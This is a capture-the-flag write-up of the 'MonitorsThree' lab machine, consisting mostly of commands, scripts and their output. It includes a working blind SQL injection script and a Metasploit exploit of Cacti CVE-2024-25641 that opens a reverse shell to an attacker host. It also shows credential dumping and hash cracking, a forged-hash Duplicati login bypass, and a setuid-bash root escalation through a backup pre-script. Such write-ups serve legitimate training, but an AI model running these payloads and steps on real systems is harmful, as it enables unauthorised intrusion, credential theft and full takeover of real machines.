MonitorsThree

Recon

└─$ grep moni /etc/hosts
10.129.48.221	monitorsthree.htb	cacti.monitorsthree.htb

HTTP (80)

Enumeration

Nothing on main page, seems like a placeholder. Enumerate subdomains:

└─$ domain="monitorsthree.htb"; ffuf -u "http://$domain" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fl 338
       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://monitorsthree.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.monitorsthree.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
 :: Filter           : Response lines: 338
________________________________________________

cacti                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 83ms]
:: Progress: [4989/4989] :: Job [1/1] :: 287 req/sec :: Duration: [0:00:18] :: Errors: 0 ::

Feroxbuster found /admin on main domain, but nothing further.

Deeper inspection on /admin route:

└─$ feroxbuster -u http://monitorsthree.htb/admin -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .php,.bak,.txt,.zip
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://monitorsthree.htb/admin
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, bak, txt, zip]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        7l       12w      162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        7l       12w      178c http://monitorsthree.htb/admin => http://monitorsthree.htb/admin/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets => http://monitorsthree.htb/admin/assets/
302      GET        0l        0w        0c http://monitorsthree.htb/admin/changelog.php => http://monitorsthree.htb/login.php
302      GET        0l        0w        0c http://monitorsthree.htb/admin/customers.php => http://monitorsthree.htb/login.php
302      GET        0l        0w        0c http://monitorsthree.htb/admin/dashboard.php => http://monitorsthree.htb/login.php
200      GET        0l        0w        0c http://monitorsthree.htb/admin/db.php
200      GET       20l       36w      303c http://monitorsthree.htb/admin/footer.php
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/css => http://monitorsthree.htb/admin/assets/css/
302      GET        0l        0w        0c http://monitorsthree.htb/admin/invoices.php => http://monitorsthree.htb/login.php
302      GET        0l        0w        0c http://monitorsthree.htb/admin/logout.php => http://monitorsthree.htb/login.php
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/images => http://monitorsthree.htb/admin/assets/images/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js => http://monitorsthree.htb/admin/assets/js/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/images/backgrounds => http://monitorsthree.htb/admin/assets/images/backgrounds/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/css/extras => http://monitorsthree.htb/admin/assets/css/extras/
302      GET        0l        0w        0c http://monitorsthree.htb/admin/tasks.php => http://monitorsthree.htb/login.php
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js/charts => http://monitorsthree.htb/admin/assets/js/charts/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/css/icons => http://monitorsthree.htb/admin/assets/css/icons/
302      GET        0l        0w        0c http://monitorsthree.htb/admin/users.php => http://monitorsthree.htb/login.php
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js/core => http://monitorsthree.htb/admin/assets/js/core/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/swf => http://monitorsthree.htb/admin/assets/swf/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/images/flags => http://monitorsthree.htb/admin/assets/images/flags/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js/maps => http://monitorsthree.htb/admin/assets/js/maps/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js/pages => http://monitorsthree.htb/admin/assets/js/pages/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js/charts/google => http://monitorsthree.htb/admin/assets/js/charts/google/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js/plugins => http://monitorsthree.htb/admin/assets/js/plugins/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js/core/libraries => http://monitorsthree.htb/admin/assets/js/core/libraries/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js/maps/google => http://monitorsthree.htb/admin/assets/js/maps/google/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js/plugins/editors => http://monitorsthree.htb/admin/assets/js/plugins/editors/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js/plugins/extensions => http://monitorsthree.htb/admin/assets/js/plugins/extensions/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js/plugins/forms => http://monitorsthree.htb/admin/assets/js/plugins/forms/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js/plugins/maps => http://monitorsthree.htb/admin/assets/js/plugins/maps/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js/plugins/media => http://monitorsthree.htb/admin/assets/js/plugins/media/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js/plugins/notifications => http://monitorsthree.htb/admin/assets/js/plugins/notifications/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js/plugins/pagination => http://monitorsthree.htb/admin/assets/js/plugins/pagination/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js/maps/vector => http://monitorsthree.htb/admin/assets/js/maps/vector/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js/plugins/trees => http://monitorsthree.htb/admin/assets/js/plugins/trees/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js/plugins/ui => http://monitorsthree.htb/admin/assets/js/plugins/ui/
301      GET        7l       12w      178c http://monitorsthree.htb/admin/assets/js/plugins/velocity => http://monitorsthree.htb/admin/assets/js/plugins/velocity/
[####################] - 5m    378240/378240  0s      found:40      errors:127
[####################] - 2m     23640/23640   245/s   http://monitorsthree.htb/admin/
[####################] - 2m     23640/23640   201/s   http://monitorsthree.htb/admin/assets/
[####################] - 3m     23640/23640   153/s   http://monitorsthree.htb/admin/assets/css/
[####################] - 3m     23640/23640   133/s   http://monitorsthree.htb/admin/assets/images/
[####################] - 3m     23640/23640   128/s   http://monitorsthree.htb/admin/assets/js/
[####################] - 3m     23640/23640   129/s   http://monitorsthree.htb/admin/assets/images/backgrounds/
[####################] - 3m     23640/23640   130/s   http://monitorsthree.htb/admin/assets/css/extras/
[####################] - 3m     23640/23640   133/s   http://monitorsthree.htb/admin/assets/js/charts/
[####################] - 3m     23640/23640   132/s   http://monitorsthree.htb/admin/assets/css/icons/
[####################] - 3m     23640/23640   134/s   http://monitorsthree.htb/admin/assets/js/core/
[####################] - 3m     23640/23640   137/s   http://monitorsthree.htb/admin/assets/swf/
[####################] - 3m     23640/23640   137/s   http://monitorsthree.htb/admin/assets/images/flags/
[####################] - 2m     23640/23640   161/s   http://monitorsthree.htb/admin/assets/js/maps/
[####################] - 2m     23640/23640   172/s   http://monitorsthree.htb/admin/assets/js/pages/
[####################] - 2m     23640/23640   177/s   http://monitorsthree.htb/admin/assets/js/plugins/
[####################] - 88s    23640/23640   267/s   http://monitorsthree.htb/admin/assets/images/ui/

There was no way Cacti was going to let us in without credentials, considering it has 2024 CVE with PoC which was just released, so I continued enumerating the base domain.

└─$ ffuf -u 'http://monitorsthree.htb/admin/FUZZ' -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -mc all -fw 6 -e .php,.bak
       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://monitorsthree.htb/admin/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt
 :: Extensions       : .php .bak
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
 :: Filter           : Response words: 6
________________________________________________

footer.php              [Status: 200, Size: 303, Words: 22, Lines: 20, Duration: 78ms]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 77ms]
db.php                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 82ms]
users.php               [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 81ms]
dashboard.php           [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 79ms]
customers.php           [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 81ms]
navbar.php              [Status: 200, Size: 6248, Words: 258, Lines: 144, Duration: 102ms]
changelog.php           [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 81ms]
invoices.php            [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 101ms]
:: Progress: [111150/111150] :: Job [1/1] :: 515 req/sec :: Duration: [0:04:05] :: Errors: 0 ::

SQLi

SQL error on /forgot_password

Brute manually because slowmap can't find anything except time based garbage, but blind exists just like him.

import string
import requests

URL = 'http://monitorsthree.htb/forgot_password.php'
CHARSET = "," + string.ascii_letters + string.digits + "_"
SUCCESS = 'Successfully sent password'

# [54] invoices,customers,changelog,tasks,invoice_tasks,users | _
PAYLOAD = "admin' AND (SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='users') LIKE '{}%' -- -"
# [46] id,username,email,password,name,position,dob,si
PAYLOAD = "admin' AND SUBSTR(password,{},1)='{}' -- -"
# [32] 31a181c8372e3afc59dab863430610e8 | _

password = ''
with requests.Session() as session:
    while True:
        for char in CHARSET:
            password_i = len(password)
            # resp = session.post(URL, data={'username': PAYLOAD.format(password + char)})
            resp = session.post(URL, data={'username': PAYLOAD.format(password_i + 1, char)})
            print(f'\r[{password_i}] {password}{char}', end='')
            if SUCCESS in resp.text:
                password += char
                break
        else:
            break
    
    print(f'\r[{password_i}] {password} | {char}')

Note: First 2 queries wasn't even required, I just messed up on my success message 👍😭

Creds: admin:greencacti2001

CVE-2024-25641

Metasploit module: https://www.rapid7.com/db/modules/exploit/multi/http/cacti_package_import_rce/

msf6 > use exploit/multi/http/cacti_package_import_rce
msf6 exploit(multi/http/cacti_package_import_rce) > set PASSWORD greencacti2001
msf6 exploit(multi/http/cacti_package_import_rce) > set RHOST 10.129.112.75
msf6 exploit(multi/http/cacti_package_import_rce) > set VHOST cacti.monitorsthree.htb
msf6 exploit(multi/http/cacti_package_import_rce) > set LHOST tun0
msf6 exploit(multi/http/cacti_package_import_rce) > exploit

[*] Started reverse TCP handler on 10.10.14.22:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Cacti version
[+] The web server is running Cacti version 1.2.26
[*] Attempting login with user `admin` and password `greencacti2001`
[+] Logged in
[*] Checking permissions to access `package_import.php`
[+] The target appears to be vulnerable.
[*] Uploading the package
[*] Triggering the payload
[*] Sending stage (39927 bytes) to 10.129.112.75
[+] Deleted /var/www/html/cacti/resource/ws4R1.php
[*] Meterpreter session 1 opened (10.10.14.22:4444 -> 10.129.112.75:57624) at 2024-08-24 16:09:43 -0400

meterpreter > shell
Process 76498 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
script /dev/null -qc /bin/bash # Get tty shell
www-data@monitorsthree:~/html/cacti/resource$
www-data@monitorsthree:~/html/app/admin$ cat db.php
<?php

$dsn = 'mysql:host=127.0.0.1;port=3306;dbname=monitorsthree_db';
$username = 'app_user';
$password = 'php_app_password';
$options = [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
];

try {
    $pdo = new PDO($dsn, $username, $password, $options);
} catch (PDOException $e) {
    echo 'Connection failed: ' . $e->getMessage();
}

www-data

Admin database dump

www-data@monitorsthree:~/html/app/admin$ mysql -u app_user -p'php_app_password' -e 'SHOW DATABASES;'
+--------------------+
| Database           |
+--------------------+
| information_schema |
| monitorsthree_db   |
+--------------------+
www-data@monitorsthree:~/html/app/admin$ mysql -u app_user -p'php_app_password' monitorsthree_db -e 'SELECT * FROM users;'
www-data@monitorsthree:~/html/app/admin$ mysql -u app_user -p'php_app_password' monitorsthree_db -e 'SELECT * FROM users;'
+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+
| id | username  | email                       | password                         | name              | position              | dob        | start_date | salary    |
+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+
|  2 | admin     | admin@monitorsthree.htb     | 31a181c8372e3afc59dab863430610e8 | Marcus Higgins    | Super User            | 1978-04-25 | 2021-01-12 | 320800.00 |
|  5 | mwatson   | mwatson@monitorsthree.htb   | c585d01f2eb3e6e1073e92023088a3dd | Michael Watson    | Website Administrator | 1985-02-15 | 2021-05-10 |  75000.00 |
|  6 | janderson | janderson@monitorsthree.htb | 1e68b6eb86b45f6d92f8f292428f77ac | Jennifer Anderson | Network Engineer      | 1990-07-30 | 2021-06-20 |  68000.00 |
|  7 | dthompson | dthompson@monitorsthree.htb | 633b683cc128fe244b00f176c8a950f5 | David Thompson    | Database Manager      | 1982-11-23 | 2022-09-15 |  83000.00 |
+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+

www-data@monitorsthree:~/html/app/admin$ mysql -u cactiuser -p'cactiuser' -e 'SHOW DATABASES;'
www-data@monitorsthree:/opt$ mysql -u cactiuser -p'cactiuser' -e 'SHOW DATABASES;'
+--------------------+
| Database           |
+--------------------+
| cacti              |
| information_schema |
| mysql              |
+--------------------+

SSH signing via password is disabled, only keys. Password with su didn't work.

Cacti database dump

Linpeas found cacti mysql config:

drwxr-xr-x 20 www-data www-data 4096 May 18 21:56 /var/www/html/cacti
-rw-r--r-- 1 www-data www-data 6955 May 18 21:46 /var/www/html/cacti/include/config.php
$database_type     = 'mysql';
$database_default  = 'cacti';
$database_username = 'cactiuser';
$database_password = 'cactiuser';
$database_port     = '3306';
$database_ssl      = false;
$database_ssl_key  = '';
$database_ssl_cert = '';
$database_ssl_ca   = '';
#$rdatabase_type     = 'mysql';
#$rdatabase_default  = 'cacti';
#$rdatabase_username = 'cactiuser';
#$rdatabase_password = 'cactiuser';
#$rdatabase_port     = '3306';
#$rdatabase_ssl      = false;
#$rdatabase_ssl_key  = '';
#$rdatabase_ssl_cert = '';
#$rdatabase_ssl_ca   = '';

www-data@monitorsthree:~/html/app/admin$ mysql -u cactiuser -p'cactiuser' cacti -e 'SHOW TABLES;'
www-data@monitorsthree:~/html/app/admin$ mysql -u cactiuser -p'cactiuser' cacti -e 'SELECT username,password FROM user_auth;'
www-data@monitorsthree:/opt$ mysql -u cactiuser -p'cactiuser' cacti -e 'SELECT username,password FROM user_auth;'
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$tjPSsSP6UovL3OTNeam4Oe24TSRuSRRApmqf5vPinSer3mDuyG90G |
| guest    | $2y$10$SO8woUvjSFMr1CDo8O3cz.S6uJoqLaTe6/mvIcUuXzKsATo77nLHu |
| marcus   | $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK |
+----------+--------------------------------------------------------------+

Crack password

Crack marcus hash as he's the only user:

➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=./rockyou.txt hashes
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
12345678910      (?)
1g 0:00:00:04 DONE (2024-08-25 00:28) 0.2389g/s 120.4p/s 120.4c/s 120.4C/s 12345678910..claire
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Privilege Escalation (marcus)

www-data@monitorsthree:/opt$ su - marcus
Password: 12345678910
marcus@monitorsthree:~$ id
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)

User.txt

marcus@monitorsthree:~$ cat user.txt
b1ffe340470dd120b1942573ebe4d69a

Privilege Escalation (root)

╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root    1136 Mar 23  2022 /etc/crontab

/etc/cron.d:
total 36
drwxr-xr-x   2 root root 4096 Aug 22 11:34 .
drwxr-xr-x 118 root root 4096 Aug 19 13:09 ..
-rw-r--r--   1 root root   67 May 18 21:47 cacti
-rw-r--r--   1 root root   46 May 20 17:30 cleanup_cacti
-rw-r--r--   1 root root   47 May 21 16:24 cleanup_cron
-rw-r--r--   1 root root   69 Aug 18 10:18 duplicati
-rw-r--r--   1 root root  201 Jan  8  2022 e2scrub_all
-rw-r--r--   1 root root  712 Jan  9  2024 php
-rw-r--r--   1 root root  102 Mar 23  2022 .placeholder
---
marcus@monitorsthree:/opt/backups/cacti$ cat /etc/cron.d/cacti
*/5 * * * * apache2 php /var/www/html/cacti/poller.php &>/dev/null
marcus@monitorsthree:/opt/backups/cacti$ cat /etc/cron.d/duplicati
*/10 * * * * root cd ~/scripts/duplicati-client && python3 client.py
marcus@monitorsthree:/opt/backups/cacti$ cat /etc/cron.d/cleanup_cacti
* * * * * root /root/scripts/cleanup_cacti.sh
marcus@monitorsthree:/opt/backups/cacti$ cat /etc/cron.d/cleanup_cron
*/5 * * * * root /root/scripts/cleanup_cron.sh
---
...
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
br-c7b83e1b07b0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.18.0.1  netmask 255.255.0.0  broadcast 172.18.255.255
        ether 02:42:89:f1:03:e7  txqueuelen 0  (Ethernet)
        RX packets 9612  bytes 2589775 (2.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 13374  bytes 1548614 (1.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:ef:52:dc:f5  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.112.75  netmask 255.255.0.0  broadcast 10.129.255.255
        ether 00:50:56:94:ff:5a  txqueuelen 1000  (Ethernet)
        RX packets 1064341  bytes 166062421 (166.0 MB)
        RX errors 0  dropped 2  overruns 0  frame 0
        TX packets 1094341  bytes 640548480 (640.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 573029  bytes 60773918 (60.7 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 573029  bytes 60773918 (60.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

veth65ddae6: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        ether 26:79:62:d3:7f:56  txqueuelen 0  (Ethernet)
        RX packets 9612  bytes 2724343 (2.7 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 13374  bytes 1548614 (1.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
...
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 0.0.0.0:8084            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:45751         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8200          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
...
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/ctr
/usr/bin/curl
/usr/bin/docker
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/sbin/runc
/usr/bin/socat
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers
ii  gcc                                                         4:11.2.0-1ubuntu1                                              amd64        GNU C compiler
ii  gcc-11                                                      11.4.0-1ubuntu1~22.04                                          amd64        GNU C compiler
ii  mono-mcs                                                    6.12.0.200-0xamarin2+ubuntu2004b1                              all          Mono C# 2.0 / 3.0 / 4.0 / 5.0  compiler for CLI 2.0 / 4.0 / 4.5
ii  mono-roslyn                                                 6.12.0.200-0xamarin2+ubuntu2004b1                              all          Microsoft C# compiler
ii  rpcsvc-proto                                                1.4.2-0ubuntu6                                                 amd64        RPC protocol compiler and definitions
/usr/bin/gcc

Duplicati

Something is running with Docker

marcus@monitorsthree:~$ cd /opt
marcus@monitorsthree:/opt$ ls -alh
total 24K
drwxr-xr-x  5 root root 4.0K Aug 18 08:00 .
drwxr-xr-x 18 root root 4.0K Aug 19 13:00 ..
drwxr-xr-x  3 root root 4.0K May 20 15:53 backups
drwx--x--x  4 root root 4.0K May 20 14:38 containerd
-rw-r--r--  1 root root  318 May 26 16:08 docker-compose.yml
drwxr-xr-x  3 root root 4.0K Aug 18 08:00 duplicati
marcus@monitorsthree:/opt$ cat docker-compose.yml
version: "3"

services:
  duplicati:
    image: lscr.io/linuxserver/duplicati:latest
    container_name: duplicati
    environment:
      - PUID=0
      - PGID=0
      - TZ=Etc/UTC
    volumes:
      - /opt/duplicati/config:/config
      - /:/source
    ports:
      - 127.0.0.1:8200:8200
    restart: unless-stopped

Inspect the config files:

marcus@monitorsthree:/opt/duplicati/config$ python3 -m http.server
---
└─$ curl 10.129.112.75:8000/CTADPNHLTC.sqlite -O
└─$ curl 10.129.112.75:8000/Duplicati-server.sqlite -O

Auth Bypass

Interesting find in Duplicati server database:

Tunnel the port

└─$ ssh marcus@10.129.112.75 -i marcus_id_rsa -L 8200:0:8200

Find interesting post about Duplicati: Bypassing Login Authentication With Server-passphrase

# server-passphrase
Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=
	Base64 -> Hex
59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a

Steps:

Intercept on
Send any input
Catch response to FIRST request
Do Javascript stuff

> let data = { // Currently intercepted data
  "Status": "OK",
  "Nonce": "HLXcNPKiAZhxGKSD4ftNwGFspaifr8geJVOZCmevpbk=",
  "Salt": "xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I="
}
> let saltedpwd = "59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a" // server-passphrase
> let noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse(data.Nonce) + saltedpwd)).toString(CryptoJS.enc.Base64);
> noncedpwd
'iIJUVoRS33tg7O9S3+9UoPHMatF+KmtzPsgdMkxMQ7c=' // Forged password

Send halted request
Replace password with noncedpwd
Pwned!

Backups

We can include a script to run before any actions. I added globally because we really don't care about single project.

The script has to be added in cacti directory by www-data! marcus doesn't have any write permissions, gotta go down permissions chain and then back up.

www-data@monitorsthree:~/html/cacti$ mkdir t && cd t
www-data@monitorsthree:~/html/cacti/t$ echo $'#!/bin/bash\ncp /bin/bash /source/tmp/rootbash\nchmod 4777 /source/tmp/rootbash\n'
#!/bin/bash
cp /bin/bash /source/tmp/rootbash
chmod 4777 /source/tmp/rootbash
www-data@monitorsthree:~/html/cacti/t$ echo $'#!/bin/bash\ncp /bin/bash /source/tmp/rootbash\nchmod 4777 /source/tmp/rootbash\n' > t.sh
www-data@monitorsthree:~/html/cacti/t$ chmod 777 t.sh

The important step is to prefix the output path for file exfiltration with /source because that's the mount point on host. /tmp/rootbash is container, /source/tmp/rootbash is the host.

marcus@monitorsthree:/var/www/html/cacti$ ls -alh /tmp/rootbash
-rwsrwxrwx 1 root root 1.4M Aug 25 06:06 /tmp/rootbash
marcus@monitorsthree:/var/www/html/cacti$ /tmp/rootbash -p
rootbash-5.1# id
uid=1000(marcus) gid=1000(marcus) euid=0(root) groups=1000(marcus)

Root.txt

rootbash-5.1# cat root.txt
f929437253024a953f17dff870ac16c4

PreviousLantern NextResource

Last updated 7 months ago

hashtagRecon

hashtagHTTP (80)

hashtagEnumeration

hashtagSQLi

hashtagCVE-2024-25641

hashtagwww-data

hashtagAdmin database dump

hashtagCacti database dump

hashtagCrack password

hashtagPrivilege Escalation (marcus)

hashtagUser.txt

hashtagPrivilege Escalation (root)

hashtagDuplicati

hashtagAuth Bypass

hashtagBackups

hashtagRoot.txt